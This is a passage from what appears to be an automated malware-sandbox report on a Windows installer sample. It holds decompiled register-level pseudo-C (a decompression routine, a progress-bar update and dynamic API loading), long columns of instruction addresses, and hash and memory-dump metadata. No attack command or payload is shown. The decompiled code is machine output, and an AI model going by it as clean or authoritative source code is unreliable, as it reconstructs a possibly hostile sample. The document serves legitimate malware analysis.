											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                0x00000000
                0x004064dd
                0x004064dd
                0x004064e1
                0x0040650a
                0x00406514
                0x004064e3
                0x004064ec
                0x004064f9
                0x004064fc
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00406840
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x00000000
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x00406843
                0x00406840

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x4e1d54
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                0x0040138a
                0x004013fa
                0x00401392
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32 ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                0x00405f30
                0x00405f33
                0x00405f3a
                0x00405f42
                0x00405f4e
                0x00000000
                0x00405f55
                0x00405f45
                0x00405f4c
                0x00000000
                0x00405f5d
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                  • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                  • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                  • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
